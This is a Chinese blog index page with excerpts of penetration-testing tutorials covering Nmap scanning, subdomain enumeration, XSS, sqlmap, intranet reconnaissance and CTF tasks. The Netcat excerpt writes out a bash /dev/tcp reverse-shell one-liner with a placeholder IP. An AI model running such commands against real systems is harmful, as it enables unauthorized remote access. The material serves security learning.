自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 收藏
  • 关注

原创 子域名收集

子域名收集介绍whois查询浏览器搜索引擎查询Layer子域名挖掘机FOFA (domain语法查询)工具探测介绍子域名爆破往往是渗透测试的第一步,是收集 IP 信息、脆弱点的前置条件。子域名爆破实际就是对每个子域名进行 DNS 查询,若存在相应解析记录则证明该子域名存在。whois查询whois(读作“Who is”,非缩写)是用来查询域名的IP以及所有者等信息的传输协议。简单说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。通过whoi

2021-02-01 01:19:27 457

原创 XSS漏洞介绍

XSS漏洞XSS简介DOM-based XSS反射型XSS存储型XSSXSS简介XSS全称Cross-site scripting,跨站脚本攻击。恶意攻击者往WEB页面里插入恶意HTML代码,当用户浏览该页面的时候,嵌入其中WEB里面的HTML代码会被执行,从而达到恶意用户的特殊目的。(到取cookie,以攻击用户的身份进行一些操作)DOM-based XSS反射型XSS存储型XSS...

2021-01-27 23:21:44 255

原创 HTTP协议与HTTPS协议的解析

HTTP协议与HTTPS协议的解析HTTP协议解析URL介绍HTTP协议详解HTTP请求请求方法HTTP状态码HTTP消息(HTTP头)请求头响应头普通头实体头HTTP与HTTPS的区别HTTPS的优点HTTPS的缺点HTTP协议解析HTTP即超文本传输协议,是一种详细规定了浏览器和万维网服务器之间互相通信的基础,它允许将HTML文档从WEB服务器传输到WEB浏览器。URL介绍URL(统一资源定位符)也被称为网页地址,是互联网标准的地址。URL的标准格式:协议://服务器ip:端口 / 路径

2021-01-23 15:03:45 436

原创 Nmap指定网卡探测,工具ndiff,Zenmap使用

指定网卡探测,工具ndiff,Zenmap使用指定特定网卡进行对应的探测情景介绍指定网卡进行探测扫描结果对比 (ndiff)使用可视化nmap(Zenamp)使用配置扫描策略指定特定网卡进行对应的探测情景介绍Nmap是一款课扩展性强的工具,并且一些NSE脚本支持嗅探。但是这种功能需要网卡支持混杂模式才可以。或者当计算机上有两张网卡,并且两张网卡对应的不同网络。Nmap提供了切换使用特定网卡进行探测的参数 -e指定网卡进行探测命令nmap -e interface CIDRinterface

2021-01-16 21:20:10 2618

原创 Nmap NSE脚本使用

NSE脚本使用NSE介绍NSE使用探测web服务的title信息(http-title)探测http服务的http头(http-headers)NSE分类使用基本使用使用发现和版本信息分类进行探测排除某个脚本分类用其他分类脚本进行探测排除多个脚本分类用其他分类脚本进行探测NSE调试功能使用NSE参数使用NSE 更新NSE脚本分类NSE介绍NSE (Nmap Script Engine)Nmap脚本引擎,内置很多可以用来扫描的,针对特定任务的脚本,通过NSE可以不断拓展Nmap的扫描策略,加强Nmap的功

2021-01-16 19:32:03 1078

原创 Nmap端口探测技巧

端口探测技巧实际场景端口探测技巧对某个端口进行探测对多个端口进行探测扫描某个范围的端口对所有端口进行探测指定协议探测端口通过协议名来扫描端口通过协议名称范围进行扫描扫描注册在nmap中的端口实际场景在实际环境中,当系统管理员对设备进行管理时,或者渗透测试人员对设备进行检测是,并不一定需要对所有的服务进行操作。极有可能是对某个或某个范围的服务进行检测。如果不管什么情况都对所有服务进行探测,会出现耗时长,费力不讨好的情况。针对这种情况,可以使用Nmap来对服务进行更加灵活的探测,避免全端口探测对服务器造成压

2021-01-15 16:26:20 1537

原创 Nmap局域网主机存活发现

局域网主机存活发现主机发现使用命令结果输出主机发现一个局域网之中存在多台设备,获取哪些设备处于开机状态可以使用ping IP地址一个ip一个ip的去实验,但是如果一个网络很大的情况下,这样手工探测会非常耗时和麻烦。也可以使用不同的工具来进行批量探测。探测之前需要明白CIDR的含义。CIDR(无类别域路由)可以快速表示一个网络。比如:192.168.1.1/24表示在192.168.1.1到192.168.1.255之间的所有主机的IP地址。使用命令命令1nmap -sP CIDR命令2

2021-01-15 15:27:25 716

原创 Nmap识别目标机器上的服务指纹

Nmap识别目标机器上的服务指纹服务指纹识别服务指纹(-sV)Nmap的侵略性探测服务指纹为了确保有一个成功的渗透测试或网络设备监控,必须需要知道目标系统中服务的指纹信息。服务指纹信息包括服务端口,服务名和版本等。Nmap通过向目标主机发送多个UDP与TCP数据包并分析其响应来进行操作系统指纹识别工作。我们可以通过分析目标往Nmap发送的数据包中某些协议标记,选项和数据,推断发送这些数据包的操作系统等。识别服务指纹(-sV)使用命令namp -sV IP地址加了-sV参数之后,得到的数据会

2021-01-15 14:38:11 678

原创 Nmap列举远程机器开放端口

Nmap列举远程机器开放端口Nmap简介原理端口状态Nmap扫描技术查看zenamp扫描端口命令行的namp扫描端口使用指定的DNS服务器来对域名进行解析目标主机存活或防火墙开启(-Pn参数)扫描特定端口范围(-p)Nmap简介Nmap (网络映射器)用于发现计算机网络上的主机和服务,从而创建网络的“映射”。为了实现其目标,Nmap将特定数据包发送到目标主机,然后分析响应。我们可以通过Nmap探测服务器存活以及开发的服务,以及对目标进行安全审计。zenamp:Namp的图形界面版本。原理判断Nm

2021-01-14 22:42:59 750 1

原创 收集域内基础信息及域控制器的查找

收集域内基础信息及域控制器的查找收集域内基础信息1.查询域2.查询域内所有计算机3.查询域内所有用户组列表4.查询所有域成员计算机列表5.获取域密码信息6.获取域信任信息查找域控制器1.查看域控制器的机器名2.查看域控制器的主机名3.查看当前时间4.查看域控制器组收集域内基础信息以下查询命令在本质上都是通过LDAP协议到域控制器上进行查询的,所以在查询时需要进行权限认证。只有域用户才拥有此权限,本地用户无法运行介绍的查询命令。System权限用户除外。LDAP: 轻量级目录访问协议。约定了Client

2021-01-14 17:00:01 980

原创 Netcat反弹shell

Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法#应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。基础介绍将liunx系统下的bash(shell)传递到window系统下的pc反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1liunx主机连接window主机bash -i :已交互模式运行bash she

2021-01-14 16:58:34 597

原创 Netcat使用

Netcat使用简介基础使用方法实现简单的通信返回shell的使用简介Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。基础使用方法实现简单的通信创建服务端方法nc -l -p [localpost]-l:启动监听模式-p:监听某个端口的连接[localpost]:需要监听的端口创建一个客

2021-01-13 21:28:48 1541

原创 sqlmap基本使用

sqlmap基本使用GET型基础参数获取数据库信息POST型基础参数使用技巧GET型基础参数GET类型的sql注入,需要用到的sqlmap参数为 -u基本格式:sqlmap + -u + url + 其他参数每一个参数都需要用空格分开简单GET型常用参数参数介绍-o开启所有优化开关-batch出现的选项全部默认选是-dbms表示该网站使用了什么类型的数据库,后需要接数据库类型。例:-dbms mysql-level执行测试的等级(1-5,

2020-12-25 21:02:45 276

原创 域内存活主机测试及域内端口扫描

域内存活主机探测利用NetBIOS快速探测内网利用ICMP协议快速探测内网快速ARP扫描探测内网arp-scan工具Empire中的arpscan模块Nishang中的Invoke-ARPScan.ps1脚本通过常规TCP/UDP端口扫描探测内网内网存活主机探测是内网渗透测试中不可缺少的一个环节。一般可以在白天或晚上分别进行探测,以对比分析存活主机和对应ip地址。利用NetBIOS快速探测内网NetBIOS是局域网程序使用的一种应用程序编程端口(API),为程序提供了请求低级别服务的统一的命令集,为局

2020-12-09 15:51:26 2428 1

原创 内网信息收集(手动收集本机信息)

内网信息收集概述收集本机信息手动收集本机信息查询网络配置信息查询操作系统及软件的信息查询本机服务信息查询进程列表查看启动程序信息查看计划任务查看主机开机时间查询用户列表概述内网信息收集需要判断三个方面:对当前机器角色的判断;对当前机器所处网络环境的拓扑结构进行分析和判断;对当前机器所在区域的判断。对当前机器角色的判断:是指判断当前机器是普通Web服务器,开发测试服务器,公共服务器,文件服务器,代理服务器,DNS服务器还是储存服务器等。对当前机器所处网络环境的拓扑结构进行分析和判断:是指对所处内

2020-12-01 21:37:32 1336 1

原创 CTF杂项题基础(1.文件识别与分离及图片隐写)

CTF杂项(misc)解题技巧杂项类型1.隐写2.压缩包处理3.流量分析4.攻击取证5.其他

2020-11-01 21:44:12 6849 1

原创 SQL注入sqli-labs学习(less-1)

sqli-labs:less-1sqli-labs靶场网址.通过sqli-labs中的题目来学习sql注入sql注入的基本步骤(1)判断是否存在注入,判断类型并且闭合语句(2)使用order by 关键字来判断字段数(3)选择注入语句,使用union查询或者报错注入(4)获取数据库用户,版本,当前连接的数据库等信息(5)获取某个数据库表的信息,获取列信息(6)获取表中的数据手工注入进入less-1页面,根据页面的英文提示,发现需要我们输入参数在后面添加参数。http://10.1

2020-10-17 21:28:37 2638

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除